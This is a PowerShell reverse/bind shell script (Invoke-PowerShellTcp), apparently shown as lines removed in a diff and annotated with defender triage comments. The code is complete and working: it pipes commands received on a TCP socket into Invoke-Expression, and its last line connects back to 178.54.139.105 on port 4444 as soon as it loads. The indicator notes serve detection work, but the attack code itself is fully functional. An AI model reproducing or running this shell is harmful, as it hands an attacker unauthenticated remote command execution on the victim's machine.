- function Invoke-PowerShellTcp
- {
- # Opens a raw TCP channel (either connect-back or bind-listen) and passes every
- # line received on it to Invoke-Expression, writing the output back to the socket.
- # In other words: an unauthenticated, unencrypted remote command shell running
- # with the privileges of the current PowerShell session. For triage, the
- # signature is TcpClient/TcpListener plus Invoke-Expression on socket data in
- # one script, and a plaintext ASCII banner/prompt visible on the wire.
- [CmdletBinding(DefaultParameterSetName="reverse")] Param(
- # "reverse" set: remote address to connect back to (required).
- # "bind" set: optional and unused by the bind path below.
- [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
- [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
- [String]
- $IPAddress,
- # TCP port: the remote port in "reverse" mode, the local listening port in "bind" mode.
- [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
- [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
- [Int]
- $Port,
- # Selects connect-back behaviour (outbound connection from the host).
- [Parameter(ParameterSetName="reverse")]
- [Switch]
- $Reverse,
- # Selects listener behaviour (a new listening port appears on the host).
- [Parameter(ParameterSetName="bind")]
- [Switch]
- $Bind
- )
- try
- {
- #Connect back if the reverse switch is used.
- # Outbound TCP connection initiated by the PowerShell process itself; an
- # unexpected powershell.exe -> external IP:port flow is the network indicator.
- if ($Reverse)
- {
- $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
- }
- #Bind to the provided port if Bind switch is used.
- # The cast invokes the TcpListener(Int32) constructor, listening on all
- # interfaces; AcceptTcpClient() blocks until the first peer connects, and no
- # check is made on who that peer is.
- if ($Bind)
- {
- $listener = [System.Net.Sockets.TcpListener]$Port
- $listener.start()
- $client = $listener.AcceptTcpClient()
- }
- # NOTE(review): if neither switch is given, $client is never assigned and the
- # GetStream() call below fails; the outer catch reports it as a connection error.
- $stream = $client.GetStream()
- # 64 KiB receive buffer, zero-filled (0..65535 yields 65536 elements).
- [byte[]]$bytes = 0..65535|%{0}
- #Send back current username and computername
- # The text sent is the standard interactive-console banner followed by
- # $env:username / $env:computername, so the operator's client mirrors a local
- # prompt. This fixed string is a usable content-inspection indicator.
- $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
- $stream.Write($sendbytes,0,$sendbytes.Length)
- #Show an interactive PowerShell prompt
- $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
- $stream.Write($sendbytes,0,$sendbytes.Length)
- # Loop until Read() returns 0, i.e. the peer closes the connection. Each Read
- # result is treated as one complete command; nothing reassembles partial sends.
- while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
- {
- # Bytes are decoded as ASCII (non-ASCII input is lossy); a new encoder is
- # created on every iteration.
- $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
- $data = $EncodedText.GetString($bytes,0, $i)
- try
- {
- #Execute the command on the target.
- # Arbitrary code execution point: whatever arrived on the socket is run as
- # PowerShell in this process. 2>&1 merges the error stream into the reply.
- $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
- }
- catch
- {
- # Terminating errors are surfaced locally on the host's warning/error streams
- # rather than only to the peer.
- Write-Warning "Something went wrong with execution of command on the target."
- Write-Error $_
- }
- # Append a fresh prompt, then the text of the most recent error record (if
- # any), and clear $error so it is not repeated on the next command.
- $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
- $x = ($error[0] | Out-String)
- $error.clear()
- $sendback2 = $sendback2 + $x
- #Return the results
- # Reply goes back in cleartext ASCII; the session is fully readable by any
- # network capture on the path.
- $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
- $stream.Write($sendbyte,0,$sendbyte.Length)
- $stream.Flush()
- }
- # Peer closed the connection: release the socket and, in bind mode, the listener.
- $client.Close()
- if ($listener)
- {
- $listener.Stop()
- }
- }
- catch
- {
- # Any failure in setup or the main loop (connection refused, unreachable host,
- # unassigned $client) ends up here.
- Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
- Write-Error $_
- }
- }
- # Top-level call: as soon as this script is loaded it connects back to
- # 178.54.139.105 on TCP 4444 and starts serving commands; that address/port pair
- # is the network indicator for this particular sample.
- Invoke-PowerShellTcp -Reverse -IPAddress 178.54.139.105 -Port 4444